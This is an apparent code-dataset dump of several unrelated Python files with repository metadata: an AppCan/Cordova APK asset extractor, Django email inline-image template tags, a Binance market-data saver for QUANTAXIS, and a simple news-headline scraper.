class Appcan(BaseModule):
def doSigCheck(self):
if self.os == "android":
return self._find_main_activity("org.apache.cordova.CordovaActivity")
elif self.os == "ios":
log.error("not support yet.")
return False
return False
def extractFromHybridApp(self, working_folder):
extract_folder = os.path.join(os.getcwd(), working_folder, self.hash)
if os.access(extract_folder, os.R_OK):
shutil.rmtree(extract_folder)
os.makedirs(extract_folder, exist_ok = True)
# extract the assets/data/dcloud_control.xml to get appid
zf = zipfile.ZipFile(self.detect_file, 'r')
code_dir = "assets/widget/"
for f in zf.namelist():
if f.startswith(code_dir):
# print(f)
# create dir anyway
td = os.path.dirname(os.path.join(extract_folder, f[len(code_dir): ]))
if not os.access(td, os.R_OK):
os.makedirs(td)
with open(os.path.join(extract_folder, f[len(code_dir): ]), "wb") as fwh:
fwh.write(zf.read(f))
return extract_folder
def decrypt(self, targetDir, key):
print(key)
def doExtract(self, targetapk):
# 加载刚才打包的jar文件
jarpath = os.path.join("../../bin/decodeAppcan_jar/decodeAppcan.jar")
jarpath2 = os.path.join("../../bin/decodeAppcan_jar/kxml2-2.3.0.jar")
jarpath3 = os.path.join("../../bin/decodeAppcan_jar/xmlpull-1.1.3.1.jar")
jarpath4 = os.path.join("../../bin/decodeAppcan_jar/apktool_2.5.0.jar")
# 获取jvm.dll 的文件路径
jvmpath = jpype.getDefaultJVMPath()
# 开启jvm
jpype.startJVM(jvmpath, "-ea", "-Djava.class.path={}:{}:{}:{}".format(jarpath,jarpath2,jarpath3,jarpath4))
# 加载java类(参数是java的长类名)
javaclass = jpype.JClass("Main")
# 实例化java对象
# javaInstance = javaClass()
# 调用java方法,由于我写的是静态方法,直接使用类名就可以调用方法
path = os.path.abspath(os.path.join(os.getcwd(), targetapk))
print(path)
launch_path = javaclass.getIndexurl(path)
# 通过os.system也能执行,但是没有执行结果,只有执行成功与否的结果
#launch_path = os.system("java -classpath /home/user/IdeaProjects/decodeAppcan/out/artifacts/decodeAppcan_jar/decodeAppcan.jar:/home/user/IdeaProjects/decodeAppcan/out/artifacts/decodeAppcan_jar/kxml2-2.3.0.jar:/home/user/IdeaProjects/decodeAppcan/out/artifacts/decodeAppcan_jar/xmlpull-1.1.3.1.jar Main /home/user/Downloads/appcan2.apk")
print(launch_path)
extract_folder = "null"
#(str(prop))就将java.lang.string转换为python的str
#如果起始页地址以"file:///android_asset/widget/"开头,则认为是hybrid开发,则需要提取apk相应目录下的文件。另外还要判断提取的文件是否加密,如果加密了则还需要解密。
if (str(launch_path)).startswith("file:///android_asset/widget/"):
extract_folder = self.extractFromHybridApp("working_folder")
cipherkey = javaclass.getCipherkey()
self.decrypt(extract_folder, cipherkey)
return extract_folder, launch_path
def main():
f = "../../../test_case/appcan_unencrypted.apk"
appcan = Appcan(f, "android")
if appcan.doSigCheck():
logging.info("cordova signature Match")
extract_folder, launch_path = appcan.doExtract(f)
log.info("{} is extracted to {}, the start page is {}".format(f, extract_folder, launch_path))
return
if __name__ == "__main__":
sys.exit(main())
| [
"984363019@qq.com"
] | 984363019@qq.com |
168e3184e9863ffa8a6ffc231b8407814c8f76a0 | 3b04961750316c08e97fcd034f0a543cc8335582 | /templatetags/emailmultirelated.py | 4401810d50c88ec5ec2ac7d656250fbb0b1d586f | [] | no_license | nex2hex/django-email-multi-related | d4a6248a4154e31e1639051ad8bd777534aa465d | f18e383a9606bb89a5f2970c46ee7d006846bc81 | refs/heads/master | 2020-05-20T13:02:10.085891 | 2015-05-20T10:37:08 | 2015-05-20T10:37:08 | 10,380,721 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,325 | py | # # -*- coding: utf-8 -*-
from django.template import Library
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.files.storage import default_storage
from ..mail import EmailMultiRelated
register = Library()
@register.simple_tag(takes_context=True)
def email_embedded_static(context, path):
"""
use this tag with EmailMultiRelated class,
tag attach inline image in email and return src attribute value
Example: <img src="{% email_inline_static "django/email/header.png" %}" width="780" height="11" alt=""/>
"""
email = context.get('emailmultirelated_object')
if isinstance(email, EmailMultiRelated):
return 'cid:' + email.attach_related_file(staticfiles_storage.path(path))
return staticfiles_storage.url(path)
@register.simple_tag(takes_context=True)
def email_embedded_media(context, path):
"""
use this tag with EmailMultiRelated class,
tag attach inline image in email and return src attribute value
Example: <img src="{% email_inline_file "django/email/header.png" %}" width="780" height="11" alt=""/>
"""
email = context.get('emailmultirelated_object')
if isinstance(email, EmailMultiRelated):
return 'cid:' + email.attach_related_file(default_storage.path(path))
return default_storage.url(path) | [
"nex2hex@ya.ru"
] | nex2hex@ya.ru |
8c912c64395761ca3421a95005ad3a8f5f2f996e | b3eacb150e22b28f405f1d0d1e09c8cf2c91cebb | /QUANTAXIS/QASU/save_binance.py | 22338470decbb0ca4d6666da31f7ed2cb7d4c12c | [
"MIT"
] | permissive | wangyuefengGH/QUANTAXIS | 77a2c4e1ce91388c0a5925d0ee159eebc13f11ed | 2e198b621680c5f3a609f9c202bd4ae583621d31 | refs/heads/master | 2020-03-19T06:21:59.738112 | 2018-06-29T05:51:17 | 2018-06-29T05:51:17 | 136,013,065 | 0 | 0 | MIT | 2018-06-29T05:51:18 | 2018-06-04T11:07:22 | Python | UTF-8 | Python | false | false | 3,077 | py | import datetime
import time
from dateutil.tz import tzutc
from dateutil.relativedelta import relativedelta
from QUANTAXIS.QAUtil import (DATABASE, QASETTING,
QA_util_get_real_date, QA_util_log_info,
QA_util_to_json_from_pandas, trade_date_sse)
from QUANTAXIS.QAFetch.QAbinance import QA_fetch_symbol, QA_fetch_kline
import pymongo
# binance的历史数据只是从2017年7月开始有,以前的貌似都没有保留 . author:Will
BINANCE_MIN_DATE = datetime.datetime(2017, 7, 1, tzinfo=tzutc())
FREQUANCY_DICT ={
"1m":relativedelta(minutes=-1),
"1d":relativedelta(days=-1),
"1h":relativedelta(hours=-1)
}
def QA_SU_save_binance(frequency):
symbol_list = QA_fetch_symbol()
col = QASETTING.client.binance[frequency]
col.create_index(
[("symbol", pymongo.ASCENDING), ("start_time", pymongo.ASCENDING)],unique=True)
end = datetime.datetime.now(tzutc())
end += FREQUANCY_DICT.get(frequency)
for index, symbol_info in enumerate(symbol_list):
QA_util_log_info('The {} of Total {}'.format
(symbol_info['symbol'], len(symbol_list)))
QA_util_log_info('DOWNLOAD PROGRESS {} '.format(str(
float(index / len(symbol_list) * 100))[0:4] + '%')
)
ref = col.find({"symbol": symbol_info['symbol']}).sort("start_time", -1)
if ref.count() > 0:
start_stamp = ref.next()['close_time'] / 1000
start_time = datetime.datetime.fromtimestamp(start_stamp, tz=tzutc())
QA_util_log_info('UPDATE_SYMBOL {} Trying updating {} from {} to {}'.format(
frequency, symbol_info['symbol'], start_time, end))
else:
start_time = BINANCE_MIN_DATE
QA_util_log_info('NEW_SYMBOL {} Trying downloading {} from {} to {}'.format(
frequency, symbol_info['symbol'], start_time, end))
data = QA_fetch_kline(symbol_info['symbol'],
time.mktime(start_time.utctimetuple()), time.mktime(end.utctimetuple()), frequency)
if data is None:
QA_util_log_info('SYMBOL {} from {} to {} has no data'.format(
symbol_info['symbol'], start_time, end))
continue
col.insert_many(data)
def QA_SU_save_binance_1min():
QA_SU_save_binance('1m')
def QA_SU_save_binance_1day():
QA_SU_save_binance("1d")
def QA_SU_save_binance_1hour():
QA_SU_save_binance("1h")
def QA_SU_save_symbols():
symbols = QA_fetch_symbol()
col = QASETTING.client.binance.symbols
if col.find().count() == len(symbols):
QA_util_log_info("SYMBOLS are already existed and no more to update")
else:
QA_util_log_info("Delete the original symbols collections")
QASETTING.client.binance.drop_collection("symbols")
QA_util_log_info("Downloading the new symbols")
col.insert_many(symbols)
QA_util_log_info("Symbols download is done! Thank you man!")
if __name__ == '__main__':
QA_SU_save_symbols()
| [
"157747074@qq.com"
] | 157747074@qq.com |
e53da388678d4b9733ee70de1f6fef2423380558 | 132e4093d7ef1214413264e9da92f912805a0ccb | /frontend/__init__.py | bb757ac35be7911b2252e4f7e9eea1d53009a723 | [] | no_license | AzoeDesarrollos/NewPyGPJ | 27b11cfd4c4783d647a0105c4587e873b7047e27 | 0d5d525ef82a8bc342ffe36df536d3c52e5d49b9 | refs/heads/master | 2023-02-08T13:37:46.543738 | 2020-12-22T14:46:39 | 2020-12-22T14:46:39 | 107,919,586 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | from .window import Window
Window() | [
"32693604Zd"
] | 32693604Zd |
3befaab53c7e724ea46e583b75b6b22aec4a5286 | 2da03bbead1fb74c22a5f5ce32692a7d8c31a923 | /scrappingHTML.py | 6df5f15bafce0a1afd8ed1a531175a0b09d5faf5 | [] | no_license | tkepassport39/webScrapingHTMLpy | 6742d98e40c5d210542385b9847e9d55c9461565 | 6736671a60cdbbc7a437c1d0cebc01f1bcf8e3e0 | refs/heads/master | 2020-09-12T06:02:59.108155 | 2019-11-18T00:59:48 | 2019-11-18T00:59:48 | 222,335,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | """
This codes purpose is to give me the latest story
listing from a specific website. Website not mentioned for reasons.
"""
import requests
from bs4 import BeautifulSoup
# get input from user
url = input("Enter the URL: ")
finalUrl = ""
# check if user input www
if "www." in url:
# replace www with http://
finalUrl = url.replace("www.", "http://")
else:
finalUrl = "https://" + url
print("url : " + finalUrl)
# get web page html content
r = requests.get(finalUrl)
# grab all the text and parse to html
soup = BeautifulSoup(r.text, 'html.parser')
formatted_link = []
for link in soup.find_all('h2', class_='post-block__title'):
# get the name of the a attribute with whitespaces stripped
name = [text for text in link.stripped_strings]
print("TITLE : " + name[0])
print("URL : " + link.a['href'])
"""
data = {
'title': name[0],
'URL': link.a['href']
}
print(data)
#formatted_link.append(data)
"""
#print(formatted_link) | [
"avanegas04@gmail.com"
] | avanegas04@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.